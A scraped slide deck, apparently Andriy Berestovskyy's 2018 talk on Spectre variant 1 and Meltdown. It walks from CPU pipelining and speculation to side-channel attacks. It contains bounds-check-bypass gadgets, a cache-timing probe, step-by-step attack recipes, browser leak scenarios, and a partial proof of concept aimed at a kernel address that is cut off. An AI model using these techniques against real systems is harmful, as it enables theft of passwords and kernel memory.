[232] 성능어디까지쥐어짜봤니 송태웅[232] 성능어디까지쥐어짜봤니 송태웅
[232] 성능어디까지쥐어짜봤니 송태웅
 
Andes RISC-V processor solutions
Andes RISC-V processor solutionsAndes RISC-V processor solutions
Andes RISC-V processor solutions
 
Velocity 2017 Performance analysis superpowers with Linux eBPF
Velocity 2017 Performance analysis superpowers with Linux eBPFVelocity 2017 Performance analysis superpowers with Linux eBPF
Velocity 2017 Performance analysis superpowers with Linux eBPF
 
Q4.11: ARM Architecture
Q4.11: ARM ArchitectureQ4.11: ARM Architecture
Q4.11: ARM Architecture
 
Yocto project and open embedded training
Yocto project and open embedded trainingYocto project and open embedded training
Yocto project and open embedded training
 
The Linux Kernel Scheduler (For Beginners) - SFO17-421
The Linux Kernel Scheduler (For Beginners) - SFO17-421The Linux Kernel Scheduler (For Beginners) - SFO17-421
The Linux Kernel Scheduler (For Beginners) - SFO17-421
 
Pic 16f877 ..
Pic 16f877 ..Pic 16f877 ..
Pic 16f877 ..
 
Simd programming introduction
Simd programming introductionSimd programming introduction
Simd programming introduction
 
BPF / XDP 8월 세미나 KossLab
BPF / XDP 8월 세미나 KossLabBPF / XDP 8월 세미나 KossLab
BPF / XDP 8월 세미나 KossLab
 
Arm système embarqué
Arm système embarquéArm système embarqué
Arm système embarqué
 
Intel core i7 processors
Intel core i7 processorsIntel core i7 processors
Intel core i7 processors
 
CPU Architectures for Mobile Phone Devices
CPU Architectures for Mobile Phone DevicesCPU Architectures for Mobile Phone Devices
CPU Architectures for Mobile Phone Devices
 
Programmation de systèmes embarqués : Systèmes temps réel et PRUSS
Programmation de systèmes embarqués : Systèmes temps réel et PRUSSProgrammation de systèmes embarqués : Systèmes temps réel et PRUSS
Programmation de systèmes embarqués : Systèmes temps réel et PRUSS
 

Similar a The Spectre of Meltdowns

了解Cpu
了解Cpu了解Cpu
了解CpuFeng Yu
 
Network Programming: Data Plane Development Kit (DPDK)
Network Programming: Data Plane Development Kit (DPDK)Network Programming: Data Plane Development Kit (DPDK)
Network Programming: Data Plane Development Kit (DPDK)Andriy Berestovskyy
 
Where Did My CPU Go?
Where Did My CPU Go?Where Did My CPU Go?
Where Did My CPU Go?Enkitec
 
Rmoug13 - where did my CPU go?
Rmoug13 - where did my CPU go?Rmoug13 - where did my CPU go?
Rmoug13 - where did my CPU go?Enkitec
 
RMOUG 2013 - Where did my CPU go?
RMOUG 2013 - Where did my CPU go?RMOUG 2013 - Where did my CPU go?
RMOUG 2013 - Where did my CPU go?Kristofferson A
 
Super scaling singleton inserts
Super scaling singleton insertsSuper scaling singleton inserts
Super scaling singleton insertsChris Adkin
 
RedGateWebinar - Where did my CPU go?
RedGateWebinar - Where did my CPU go?RedGateWebinar - Where did my CPU go?
RedGateWebinar - Where did my CPU go?Kristofferson A
 
PerfUG 3 - perfs système
PerfUG 3 - perfs systèmePerfUG 3 - perfs système
PerfUG 3 - perfs systèmeLudovic Piot
 
General Purpose Computing using Graphics Hardware
General Purpose Computing using Graphics HardwareGeneral Purpose Computing using Graphics Hardware
General Purpose Computing using Graphics HardwareDaniel Blezek
 
Troubleshooting Linux Kernel Modules And Device Drivers
Troubleshooting Linux Kernel Modules And Device DriversTroubleshooting Linux Kernel Modules And Device Drivers
Troubleshooting Linux Kernel Modules And Device DriversSatpal Parmar
 
Troubleshooting linux-kernel-modules-and-device-drivers-1233050713693744-1
Troubleshooting linux-kernel-modules-and-device-drivers-1233050713693744-1Troubleshooting linux-kernel-modules-and-device-drivers-1233050713693744-1
Troubleshooting linux-kernel-modules-and-device-drivers-1233050713693744-1Jagadisha Maiya
 
Performance evaluation with Arm HPC tools for SVE
Performance evaluation with Arm HPC tools for SVEPerformance evaluation with Arm HPC tools for SVE
Performance evaluation with Arm HPC tools for SVELinaro
 
Nvidia tegra K1 Presentation
Nvidia tegra K1 PresentationNvidia tegra K1 Presentation
The Spectre of Meltdowns

  • 1. Andriy Berestovskyy, 2018. The Spectre of Meltdowns. (ц) Андрій Берестовський. Networking hour, Semihalf (berestovskyy). [Title-slide tag cloud: TCP, UDP, NAT, IPsec, IPv4, IPv6, internet protocols, AH, ESP, authentication, authorization, accounting, encapsulation, security, BGP, OSPF, ICMP, ACL, SNAT, tunnel, PPPoE, GRE, ARP, discovery, NDP, OSI, broadcast, multicast, IGMP, PIM, MAC, DHCP, DNS, fragmentation]
  • 2. The Spectre of Meltdowns ● Evolution of CPUs ● Spectre1 Attack ● Security Holy Grail ● Meltdown3 Attack ● Fixes ● Spectre-Based Meltdown PoC 2 CPU?
  • 3. Central Processing Unit (CPU) — electronic circuitry that performs basic arithmetic, logical, control and input/output operations specified by the instructions. — Wikipedia 3 Basic means simple, right?
  • 4. Modern CPU Die. About 2 billion transistors. Why is it so complicated? How does it work? Source: Kaby Lake, https://newsroom.intel.com/press-kits/8th-gen-intel-core/
  • 5. CPU Basic Operation Cycle* 5 Hardware implementation? Start Fetch Instruction at PC Decode Instruction Load Data From Memory Execute Instruction Write Data to Memory Update Registers and PC * Instruction Cycle
  • 7. Instructions Per Second (IPS) — measure of a computer's processor speed. — Wikipedia 7 MIPS? FLOPS?
  • 8. 4MHz CPU Performance. Code: mov len(%rip), %rdx; xor %eax, %eax; cmp %rdi, %rdx; ... [Timing diagram: mov occupies cycles 1-4 (Fetch, Decode, Execute, Write), xor occupies cycles 5-8, and cmp starts its Fetch in cycle 9.] 4M cycles per second / 4 cycles per instruction = 1 MIPS. More performance! Solutions? ...one cycle per instruction?
  • 9. Instruction pipelining — process different parts of instructions in parallel, i.e. an attempt to keep every part of the CPU busy. — Wikipedia 9 Let’s do it!
  • 11. Performance: Instruction Pipelining 11 Cycle 1 Fetch Decode Execute 2 3 5 6 7 8 Fetch Decode Write mov ... xor ... cmp ... 9 Fetch Basic Pipeline Execute Write div ... Decode Execute Write Write 4 Execute Decode Fetch How many MIPS for 4MHz CPU now?
  • 12. 4MHz CPU with Pipeline. Code: mov len(%rip), %rdx; xor %eax, %eax; cmp %rdi, %rdx; ... [Timing diagram: mov, xor and cmp each pass through Fetch, Decode, Execute and Write, each starting one cycle after the previous instruction.] 4M cycles per second / 1 cycle per instruction = 4 MIPS. More performance! ...more MHz?
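
The cycle counts behind slides 8 and 12 can be checked with a short sketch. It assumes an ideal four-stage pipeline with no stalls; the function names are illustrative and do not come from the slides.

```c
#include <stdint.h>

/* Cycles to run n instructions when each one occupies the whole CPU
 * for all `stages` steps before the next may start (no pipelining). */
uint64_t cycles_sequential(uint64_t n, uint64_t stages) {
    return n * stages;
}

/* Cycles for an ideal pipeline with no stalls (an assumption): the first
 * instruction needs `stages` cycles, and every later instruction
 * completes one cycle after its predecessor. */
uint64_t cycles_pipelined(uint64_t n, uint64_t stages) {
    return n == 0 ? 0 : stages + (n - 1);
}
```

For the three instructions on the slides (mov, xor, cmp) and four stages, the sequential CPU needs 12 cycles while the ideal pipeline needs 6; for long instruction streams the pipelined cost approaches one cycle per instruction.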
  • 13. 8MHz CPU with Pipeline 13 Cycle 1 F D E W 2 3 4 5 6 7 8 mov ... xor ... cmp ... 9 8M cycles per second / 1 cycle per instruction = 8 MIPS More performance? F D E W F D E W 10 11 12 13 14 15 16 17 mov len(%rip), %rdx xor %eax, %eax cmp %rdi, %rdx ...
  • 14. 40MHz CPU Performance 14 Cycle mov ... xor ... cmp ... 40M cycles per second / 1 cycle per instruction = 40 MIPS? Really? mov len(%rip), %rdx xor %eax, %eax cmp %rdi, %rdx ...
  • 15. Clock Speed Does Not Scale 15 Cycle mov ... xor ... cmp ... 40M cycles per second / 1 cycle per instruction = 40 MIPS Source: https://en.wikipedia.org/wiki/Megahertz_myth Why?
  • 16. Memory Trends. (First Word) DRAM latency has stayed the same since the mid-'90s. More performance! ...but DRAM is slow... Solutions? Source: https://en.wikipedia.org/wiki/CAS_latency
  • 17. Cache — faster memory, closer to a CPU, which stores copies of frequently used main memory locations. — Wikipedia 17 Let’s do it!
  • 18. CPU with Pipeline and Cache 18 InstructionFetch/Decode Memory PC InstructionDecode/Execute Registers InstructionExecute/Write ALU Performance? Data Cache Instr. Cache Write Buffer * Intel i486 and newer WriteExecuteDecode/LoadInstruction Fetch What’s changed?
  • 19. CPU with Pipeline and Cache. [Timing diagram: mov, xor, cmp and div in the pipeline, with stalls marked at a cache miss and at div.] 40M cycles per second / ~4 cycles per instruction = ~10 MIPS. Stalls :( More performance! ...but pipeline sometimes stalls... Solution?
  • 20. Superscalar CPU — executes more than one instruction during a clock cycle using different execution units. — Wikipedia 20 Let’s do it!
  • 21. Superscalar CPU Instruction Cycle 21 Performance? Start Fetch Two Instructions Decode Two Instruction Load Order: D1, D2 Execute Two Instructions Write Order: D1, D2 Update Order: D1, D2 * Intel Pentium and newer Why order?
  • 22. Superscalar CPU with Cache. [Timing diagram: mov, xor, cmp and div; a cache miss and div cause stalls because of read ordering and write ordering.] 40M CPS / ~4 CPI * 1.5 instructions per cycle = ~15 MIPS. Ordering :( More performance! ...but stall due to ordering... Solutions?
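
The MIPS estimates quoted on slides 8, 12, 19 and 22 all follow one formula. A minimal sketch, in which the function and parameter names are assumptions made for illustration:

```c
#include <stdint.h>

/* MIPS = clock (MHz) / cycles per instruction * instructions issued per cycle.
 * issue_width is 1 for a scalar CPU; the slides use ~1.5 for the superscalar case. */
double mips(double clock_mhz, double cycles_per_instr, double issue_width) {
    return clock_mhz / cycles_per_instr * issue_width;
}
```

With the slide figures: mips(4, 4, 1) gives 1 (no pipeline), mips(4, 1, 1) gives 4 (pipeline), mips(40, 4, 1) gives 10 (pipeline with stalls), and mips(40, 4, 1.5) gives 15 (superscalar).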
  • 23. Out-of-Order (dynamic) Execution — processor executes instructions in order of input data and execution units availability, not by their original order in a program. — Wikipedia 23 Let’s do it!
  • 24. Out of Order CPU. [Timing diagram: mov, xor, cmp and div; reads are reordered around the cache miss and writes are reordered around div.] Read reordering :( Write reordering :( Re-order buffers on Intel CPUs improve the average instructions-per-cycle ratio. * Intel Pentium Pro and newer. Why? What about conditional jumps?
  • 25. Conditional Jumps uint8_t array[ 256]; size_t array_size = 256; uint8_t bounds_check(size_t idx) { if (idx < array_size) return array[idx]; return 0; } 25 bounds_check: xor %eax, %eax cmp %rdi, array_size(%rip) jbe .L1 mov array(%rdi), %eax .L1: ret Performance? Full source: https://godbolt.org/g/Snb13E
  • 26. dependencyjbe ... mov or ret? OoO CPU vs Conditional Jumps 26 Cycle cmp ... cache miss Solutions? xor %eax, %eax cmp %rdi, array_size(%rip) jbe .L1 mov array(%rdi), %eax .L1: ret xor ... stall? ...but next instruction is unknown... More performance! PC PC
  • 27. Speculative Execution —perform some tasks that may not be needed. — Wikipedia 27 Let’s do it!
  • 28. CPU with Speculative Execution. Code: xor %eax, %eax; cmp %rdi, array_size(%rip); jbe .L1; mov array(%rdi), %eax; .L1: ret. [Timing diagram: cmp waits on a cache miss and jbe depends on cmp; meanwhile mov* and ret* are executed speculatively, and mov* itself hits a cache miss.] Continue with mov! What if speculation is incorrect?
  • 29. branch miss penalty dependencyjbe ... Branch Miss 29 Cycle cmp ... cache miss xor ... speculation cache missmov* ret* icache missret Options? speculation Flush the pipeline! ...but branch misses are very expensive... More performance! PC miss
  • 30. Speculation Options. xor %eax, %eax cmp %rdi, array_size(%rip) jbe .L1 ret ... mov array(%rdi), %eax ret ... Options: 1. Execute left branch 2. Execute right branch 3. Execute both branches 4. Other? Pros/cons? Solution?
  • 31. Branch Predictor — digital circuit that tries to guess which way a branch will go before this is known definitively. — Wikipedia 31 How does it work?
  • 32. Branch Predictor. [Diagram: for the sequence xor, cmp, jbe, mov, ret, the last n bits of the branch instruction address select one of 2^n elements of the Branch History Table; each element holds a Y/N history, from which the prediction is made.] Source: https://en.wikipedia.org/wiki/Branch_predictor Let’s do it!
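
The table lookup on slide 32 can be sketched as follows. The slide only shows Y/N history per entry; the 2-bit saturating counter used here is a common textbook scheme chosen as an assumption, as are the table size and all names. Real predictors are considerably more elaborate.

```c
#include <stdbool.h>
#include <stdint.h>

#define BHT_BITS 4                 /* n: low address bits used as the index */
#define BHT_SIZE (1u << BHT_BITS)  /* 2^n table entries */

/* One 2-bit saturating counter per entry (assumed scheme):
 * 0 and 1 predict "not taken", 2 and 3 predict "taken".
 * Static zero initialisation starts every entry at "not taken". */
static uint8_t bht[BHT_SIZE];

static unsigned bht_index(uint64_t branch_addr) {
    return (unsigned)(branch_addr & (BHT_SIZE - 1));
}

/* Guess the branch direction before the condition is known. */
bool bht_predict(uint64_t branch_addr) {
    return bht[bht_index(branch_addr)] >= 2;
}

/* Train the entry once the real outcome is known. */
void bht_update(uint64_t branch_addr, bool taken) {
    uint8_t *counter = &bht[bht_index(branch_addr)];
    if (taken && *counter < 3)
        (*counter)++;
    else if (!taken && *counter > 0)
        (*counter)--;
}
```

Because only the low address bits are used, two branches whose addresses share those bits train the same entry. The attack steps later in the deck rely on training: calling bounds_check() a few times with a valid index biases the prediction before the out-of-bounds call.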
  • 33. dependencyjbe ... CPU with Branch Predictor 33 Cycle cmp ... cache miss xor %eax, %eax cmp %rdi, array_size(%rip) jbe .L1 mov array(%rdi), %eax .L1: ret xor ... mov* ret* Solutions? speculationspeculation cache miss ...but there are no more ideas... More performance! PC PC Prediction: do not take branch
  • 34. Multi-Core Processor — CPU with two or more independent processing units called cores, which read and execute program instructions. — Wikipedia 34 How many cores?
  • 35. CPU Trends 35Source: https://en.wikipedia.org/wiki/List_of_Intel_CPU_microarchitectures and https://en.wikipedia.org/wiki/Transistor_count CPU clock limit? Summary? 72 cores * 4 = 288 threads
  • 36. CPU Performance Summary + Instruction Pipelines + Memory Cache + Superscalar Execution + Out of Order Execution + Speculative Execution + Branch Prediction + Multiple Cores ± CPU Clock (to a certain extent) 36 Modern CPU Core?
  • 37. Modern CPU Core 37Source: Skylake Microarchitecture, Intel 64 and IA-32 Architectures Optimization Reference Manual Instruction Decode Queue (micro-op queue) Allocate/Rename/Retire/Move Elimination/Zero Idiom Scheduler ALU Vec ALU Vec Shft Vec Add Vec Mul FMA DIV Branch2 ALU Fast LEA Vec ALU Vec Shft Vec Add Vec Mul FMA Slow Int Slow LEA ALU Fast LEA Vec ALU Vec Shuff LD/STA LD/STA STD STA 32K L1 Data Cache 256K L2 Cache 32K L1 Instruct. Cache MSROM Decoded Icache Legacy Decode Pipeline Branch Prediction Unit ALU SHFT Branch1 Port 0 Port 1 Port 5 Port 6 P. 2 P. 3 P. 4 P. 7 Modern CPU Die? L3
  • 38. Modern CPU Die. [Die diagram: six CPU cores, each with ALUs, caches and a BPU, plus L3 cache slices, system agent, memory controller, interconnect and GPU.] About 2 billion transistors. So, why is it so complicated? Source: https://newsroom.intel.com/press-kits/8th-gen-intel-core/
  • 39. Because we need performance! 39 So, what about Spectre et al?
  • 40. All Your Secrets Belong to Us () uint8_t array[ 256 * 4096]; size_t array_size = 256; uint8_t bounds_check(size_t idx) { if (idx < array_size) return array[idx * 4096]; return 0; } 40 bounds_check: xor %eax, %eax cmp %rdi, array_size(%rip) jbe .L1 sal $12, %rdi mov array(%rdi), %eax .L1: ret Execution? Full source: https://godbolt.org/g/Snb13E Why?
  • 41. dependencyjbe ... Bounds Check on Modern CPU 41 Cycle cmp ... cache miss xor %eax, %eax cmp %rdi, array_size(%rip) jbe .L1 sal $12, %rdi mov array(%rdi), %eax xor ... mov* sal* speculation cache miss What about cache? PC PC speculation Prediction: do not take branch
  • 42. sal* speculation Virtual Memory dependencyjbe ... Memory Prior Cache Misses 42 array cmp ... cache miss cmp %rdi, array_size(%rip) jbe .L1 sal $12, %rdi mov array(%rdi), %eax mov* speculationcache miss What will happen after execution? array_size array_size * 4096 “cold” memory cached memory PC PC Current Cycle Prediction: do not take branch
  • 43. Virtual Memory dependencyjbe ... Memory After Cache Misses 43 array cmp ... cache miss cmp %rdi, array_size(%rip) jbe .L1 sal $12, %rdi mov array(%rdi), %eax mov* cache miss array_size “cold” memory cached memory What if we missed the branch? PC PC Current Cycle sal* speculation speculation Prediction: do not take branch array_size * 4096
  • 44. cmp ... cache miss Virtual Memory dependencyjbe ... Memory After Branch Miss 44 array sal $12, %rdi mov array(%rdi), %eax .L1: ret mov* cache miss array_size “cold” memory cached memory PC sal* speculation speculation Side effect! miss retPC Flush the pipeline! How to detect cache side effect?
  • 45. Observing Cache Side Effects. uint8_t array[256 * 4096]; size_t array_size = 256; ... for (i = 0; i < 256; i++) { start = rdtscp(); tmp = array[i * 4096]; cycles = rdtscp() - start; ... } * Simplification. [Memory diagram: array and array_size in virtual memory, marked as “cold” or cached memory; the speculation side effect is a cached part of array.] How can we exploit these side effects?
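
Once the loop on slide 45 has measured all 256 reads, the cached slot still has to be picked out. A minimal sketch of that decoding step, assuming the per-slot cycle counts were already collected into an array; the function name and the threshold parameter are hypothetical, although the threshold plays the same role as MAX_READ_CYCLES in the PoC on slide 73.

```c
#include <stddef.h>
#include <stdint.h>

#define BYTE_VALUES 256

/* Return the byte value whose probe slot was read fastest, or -1 if no
 * slot was read within max_hit_cycles (i.e. nothing looked cached). */
int fastest_slot(const uint64_t cycles[BYTE_VALUES], uint64_t max_hit_cycles) {
    int best = -1;
    for (int i = 0; i < BYTE_VALUES; i++) {
        if (cycles[i] <= max_hit_cycles &&
            (best < 0 || cycles[i] < cycles[best]))
            best = i;
    }
    return best;
}
```

In practice a single measurement is noisy, so repeating the probe and voting across runs is a reasonable refinement; the MIN_READS constant in the PoC suggests the original code does something along those lines.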
  • 46. bounds_check(unsigned long): xor %eax, %eax cmp %rdi, array_size(%rip) jbe .L1 mov base_array(%rdi), %eax sal $12, %eax mov side_effects(%rax), %eax .L1: rep ret Memory Before Indirect Read 46 Virtual Memory base_arrayarray_size “cold” memory cached memory size_t array_size = 16; uint8_t side_effects[256 * 4096]; uint8_t base_array[16]; uint8_t bounds_check(uint64_t idx) { if (idx < array_size) { uint8_t byte = base_array[idx]; return side_effects[byte * 4096]; } return 0; } After? side_effects byte = base_array[idx] side_effects[byte * 4096] precached data array_size Full source: https://github.com/berestovskyy/spectre-meltdown Cache miss! Cache miss! Why?
  • 47. bounds_check(unsigned long): xor %eax, %eax cmp %rdi, array_size(%rip) jbe .L1 mov base_array(%rdi), %eax sal $12, %eax mov side_effects(%rax), %eax .L1: rep ret Memory After Indirect Read 47 Virtual Memory base_arrayarray_size “cold” memory cached memory size_t array_size = 16; uint8_t side_effects[256 * 4096]; uint8_t base_array[16]; uint8_t bounds_check(uint64_t idx) { if (idx < array_size) { uint8_t byte = base_array[idx]; return side_effects[byte * 4096]; } return 0; } Pipeline? side_effects byte = base_array[idx] side_effects[byte * 4096] precached data array_size Full source: https://github.com/berestovskyy/spectre-meltdown
  • 48. dependencyjbe ... Bounds Check Pipeline 48 Cycle cmp ... array_size bounds_check(unsigned long): cmp %rdi, array_size(%rip) jbe .L1 mov base_array(%rdi), %eax sal $12, %eax mov side_effects(%rax), %eax mov* mov* Prediction: do not take branch speculation side_effects PC PC sal* Data is precached Speculative read from side_effect Can we reach outside the array?
  • 49. bounds_check(unsigned long): xor %eax, %eax cmp %rdi, array_size(%rip) jbe .L1 mov base_array(%rdi), %eax sal $12, %eax mov side_effects(%rax), %eax .L1: rep ret Bounds Check Bypass 49 Virtual Memory base_arrayarray_size “cold” memory cached memory secret size_t array_size = 16; uint8_t side_effects[256 * 4096]; uint8_t base_array[16]; uint8_t bounds_check(uint64_t idx) { if (idx < array_size) { uint8_t secret = base_array[idx]; return side_effects[secret * 4096]; } return 0; } Spectre? side_effects secret = base_array[idx], idx = secret - base_array side_effects[secret * 4096] precached secret array_size Full source: https://github.com/berestovskyy/spectre-meltdown
  • 50. Putting All Together: Spectre1 1. Call bounds_check() a few times with a valid index 2. Flush array_size from cache to get a cache miss 3. Call bounds_check() with an index pointing to the secret 4. Use secret as an index to side_effects 5. Observe side_effects access time. Full source: https://github.com/berestovskyy/spectre-meltdown Summary?
  • 51. Spectre1 Summary 1. Reason: cache side effects 2. The source code is valid, no (easy) fix in software 3. Cache side-channel might be fixed in the future 4. Reads any byte within current process memory 51 Is it even dangerous?
  • 52. 1. eBPF 2. Java 3. JavaScript Online checker: https://xlab.tencent.com/special/spectre/ 4. Other JIT engines ouch! Spectre1 Victims 52 Scenarios?
  • 53. HTTP POST secrets.json5 JavaScript Attack Scenario 53 Web Browser Web Server GET /1 2 OK index.html 4 GET /spectre.js3 OK spectre.js Parse index.html Execute spectre.js Execution?
  • 54. JavaScript Attack Execution. JavaScript: if (index < base_array.length) { secret = base_array[index | 0]; secret = (secret * 4096) | 0; tmp ^= side_effects[secret | 0] | 0; } JIT output: cmp r15, [rbp - 0xe0]; jnc 0x24dd099bb870; lea rsi, [r12 + rdx * 1]; mov rsi, [rsi + r15 * 1]; shl rsi, 12; and rsi, 0x1ffffff; mov rsi, [rsi + r8 * 1]; xor rsi, rdi; mov rdi, rsi. [Memory diagram: inside the browser, the JavaScript JIT sandbox holds base_array, length and side_effects; browser passwords lie outside the sandbox and are reached through side_effects[secret * 4096]; memory is marked as “cold” or cached.] Source: Spectre Attacks: Exploiting Speculative Execution, Paul Kocher et al. Meltdown?
  • 55. Most important security feature? 55
  • 56. Process isolation: hardware and software technologies designed to protect each process from other processes by disallowing inter-process memory access. (Wikipedia) Hardware? In practice?
  • 57. Virtual Memory — abstraction of the resources that are actually available on a given machine. Combination of hardware and software maps Virtual Addresses into Physical Addresses. — Wikipedia 57 How to map Virtual to Physical?
  • 58. Translation Lookaside Buffer (TLB) — stores recent translations of virtual memory to physical memory, i.e. address-translation cache. Part of CPU memory-management unit (MMU). — Wikipedia 58 Drawings!
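
The translation cache described on slides 57 and 58 can be illustrated with a toy lookup. This is only a sketch under stated assumptions: 4 KB pages, a tiny fully associative table searched linearly, and hypothetical names throughout. A real MMU does this in hardware and walks the page tables on a miss.

```c
#include <stdbool.h>
#include <stdint.h>

#define PAGE_SHIFT 12                          /* 4 KB pages (assumed) */
#define PAGE_MASK ((1ull << PAGE_SHIFT) - 1)
#define TLB_ENTRIES 4                          /* toy size, not a real TLB */

struct tlb_entry {
    bool valid;
    uint64_t vpn; /* virtual page number */
    uint64_t pfn; /* physical frame number */
};

/* Look up vaddr. On a hit, store the physical address in *paddr and
 * return true. On a miss, return false and leave *paddr untouched. */
bool tlb_translate(const struct tlb_entry tlb[TLB_ENTRIES],
                   uint64_t vaddr, uint64_t *paddr) {
    uint64_t vpn = vaddr >> PAGE_SHIFT;
    for (int i = 0; i < TLB_ENTRIES; i++) {
        if (tlb[i].valid && tlb[i].vpn == vpn) {
            *paddr = (tlb[i].pfn << PAGE_SHIFT) | (vaddr & PAGE_MASK);
            return true;
        }
    }
    return false;
}
```

Only the page number is translated; the low 12 bits pass through unchanged as the offset within the page.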
  • 59. Process Isolation 59 Process 1 arraymain() Process 2 main() 64 bit virtual address space Kernel syscall() Physical Memory data Swap Why? Mapped by OS, translated using TLB. How to communicate?
  • 60. System Call: programmatic way to request a service from the kernel. A syscall is a privilege level switch, not a process context switch, i.e. a syscall is processed in the user process context. (Wikipedia) Why no process context switch?
  • 61. Skylake TLB Cache Hierarchy (level, page size, entries): Instruction, 4KB, 128; Instruction, 2MB/4MB, 8 per thread; First Level Data, 4KB, 64; First Level Data, 2MB/4MB, 32; First Level Data, 1GB, 4; Second Level, shared 4KB and 2/4MB, 1536; Second Level, 1GB, 16. Not that much :( So, if no process context switch... ...how to access kernel data? Source: Skylake Microarchitecture, Intel 64 and IA-32 Architectures Optimization Reference Manual
  • 62. Start Kernel Map Kernel Mapping 62 Process 1 array1main() Process 2 main() Kernel syscall() Physical Memory data Swap Kernel syscall() data SYSCALL data access Now, how to protect kernel data? Bomba!
  • 63. CPU Privilege Level — per-process operating mode restrictions on type and scope of operations that can be performed, i.e. OS to run with more privileges than application software. — Wikipedia 63
  • 64. Start Kernel Map Privilege Level Switch 64 Process array1main() Kernel syscall() data kernel is able to access process data So, what is Meltdown? Mega! privilege level switch (SYSCALL) 64 bit virtual address space process is not able to access kernel data
  • 65. Meltdown — hardware vulnerability, which allows a rogue process to read all memory, even when it is not authorized to do so. — Wikipedia 65 Kernel is mapped to each process...
  • 66. Start Kernel Map Meltdown 66 Process array1main() Kernel syscall() data kernel is able to access process data Let’s do it! Meltdown :( 64 bit virtual address space process is able to read kernel data
  • 67. bounds_check(unsigned long): xor %eax, %eax cmp %rdi, array_size(%rip) jbe .L1 mov base_array(%rdi), %eax sal $12, %eax mov side_effects(%rax), %eax .L1: rep ret Recap: Bounds Check Bypass 67 Virtual Memory base_arrayarray_size “cold” memory cached memory secret size_t array_size = 16; uint8_t side_effects[256 * 4096]; uint8_t base_array[16]; uint8_t bounds_check(uint64_t idx) { if (idx < array_size) { uint8_t secret = base_array[idx]; return side_effects[secret * 4096]; } return 0; } Can we exploit it to access kernel data? side_effects secret = base_array[idx] side_effects[secret * 4096] precached secret array_size Full source: https://github.com/berestovskyy/spectre-meltdown
  • 68. bounds_check(unsigned long): xor %eax, %eax cmp %rdi, array_size(%rip) jbe .L1 mov base_array(%rdi), %eax sal $12, %eax mov side_effects(%rax), %eax .L1: rep ret Spectre1 Attack to Kernel Data 68 Virtual Memory base_arrayarray_size “cold” memory cached memory kernel size_t array_size = 16; uint8_t side_effects[256 * 4096]; uint8_t base_array[16]; uint8_t bounds_check(uint64_t idx) { if (idx < array_size) { uint8_t secret = base_array[idx]; return side_effects[secret * 4096]; } return 0; } side_effects secret = base_array[idx] side_effects[secret * 4096] precached kernel array_size Full source: https://github.com/berestovskyy/spectre-meltdown How?
  • 69. Putting It All Together: Meltdown3
    1. Find the address of a kernel structure (out of scope)
    2. Invoke a system call to cache this structure
    3. Do Spectre1, but with a kernel address:
       a. Call bounds_check() a few times with a valid index
       b. Flush array_size from the cache to get a cache miss
       c. Call bounds_check() with an index pointing to the kernel structure
       d. Use the secret as an index into side_effects
       e. Observe the side_effects access time
    Summary?
    Full source: https://github.com/berestovskyy/spectre-meltdown
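Steps 3a and 3c can be sketched with the index arithmetic that the PoC on the later slides uses (addr -= &base_array, then addr & (i % BRANCH_TRAINS - 1)). The helper names index_for_address() and schedule_index() below are hypothetical; the sketch only computes which index each call would pass to bounds_check() and performs no speculative access.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define BRANCH_TRAINS 6

uint8_t base_array[BRANCH_TRAINS];

/* Index idx such that &base_array[idx] wraps around to the target address.
 * Unsigned subtraction is modular, so this works for any 64-bit target. */
uint64_t index_for_address(uint64_t target)
{
    return target - (uint64_t)(uintptr_t)base_array;
}

/* Index passed to bounds_check() on call number i (calls are 1-based).
 * The mask is 0..4 on five calls out of six, which yields a valid index
 * and trains the branch; on every sixth call it wraps to all ones and
 * lets the out-of-bounds index through unchanged. */
uint64_t schedule_index(uint64_t idx, size_t i)
{
    assert(i >= 1);
    uint64_t mask = (uint64_t)(i % BRANCH_TRAINS) - 1;
    return idx & mask;
}
```

For i = 1..5 the result is always below BRANCH_TRAINS, and for i = 6 it equals the full out-of-bounds index. Selecting the index with a mask rather than an if statement avoids adding another branch that the predictor could learn.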
  • 70. Meltdown3 Summary
    1. Reason 0: hardware bug: memory is accessed and privileges are checked in parallel
    2. Reason 1: cache side effects (i.e. Spectre)
    3. Reason 2: the kernel is mapped into every process, so entering it is a privilege level switch, not a process context switch
    4. Reads any mapped and cached byte
    Is it even dangerous?
  • 71. Meltdown Attack Scenario (Web Browser and Web Server)
    1. Browser: GET /
    2. Server: OK index.html; the browser parses index.html
    3. Browser: GET /meltdown.js
    4. Server: OK meltdown.js; the browser executes meltdown.js with valid syscalls
    5. Browser: HTTP POST kernel-data.json
    How to fix?
  • 72. Fixes: An Open Question
    Spectre1: 1. Speculation barrier 2. Other?
    Meltdown3: 1. Process context switch instead of privilege level switch 2. PCID/ASID 3. Other?
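One way to read "speculation barrier" for Spectre1 is to place a fence between the bounds check and the dependent load. Below is a minimal sketch of the recap's bounds_check() with such a fence. It assumes an x86-64 target with GCC or Clang, where _mm_lfence() from <emmintrin.h> emits LFENCE, and a CPU on which LFENCE holds back later instructions until the comparison has resolved. The name bounds_check_fenced() is hypothetical and does not come from the deck.

```c
#include <emmintrin.h> /* _mm_lfence(), available with SSE2 */
#include <stddef.h>
#include <stdint.h>

#define BYTE_VALUES 256
#define PAGE_SIZE 4096

size_t array_size = 16;
uint8_t side_effects[BYTE_VALUES * PAGE_SIZE];
uint8_t base_array[16];

/* Same logic as bounds_check() from the recap slide, plus a fence. */
uint8_t bounds_check_fenced(uint64_t idx)
{
    if (idx < array_size) {
        /* Assumption: the loads below do not start until the bounds
         * check above has actually completed, so a mispredicted branch
         * cannot reach base_array[idx] with an out-of-bounds idx. */
        _mm_lfence();
        uint8_t secret = base_array[idx];
        return side_effects[secret * PAGE_SIZE];
    }
    return 0;
}
```

The architectural result is unchanged: valid indexes still return the side_effects entry and invalid ones return 0. The cost is that every call now waits for the comparison, which is one reason the slide lists the fix as an open question.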
  • 73. Spectre-Based Meltdown PoC
      #define MIN_READS 100
      #define MAX_READ_CYCLES 1000
      #define BRANCH_TRAINS 6
      #define BYTE_VALUES 256
      #define PAGE_SIZE 4096

      size_t array_size = BRANCH_TRAINS;
      uint8_t side_effects[BYTE_VALUES * PAGE_SIZE] = {1};
      uint8_t base_array[BRANCH_TRAINS];
      uint8_t tmp;
      char secret[] = "My password";
      int fd;

      uint8_t bounds_check(uint64_t idx) {
          if (idx < array_size)
              return side_effects[base_array[idx] * PAGE_SIZE];
          return 0;
      }

      uint8_t read_any_byte(uint64_t addr);

      int main(int argc, char **argv) {
          uint8_t byte;
          uint64_t addr = (uint64_t)&secret;
          /* No argument: use the default kernel address; an argument of 0 selects the local secret. */
          addr = argc < 2 ? 0xffffffff81800040ULL : strtoull(argv[1], NULL, 0);
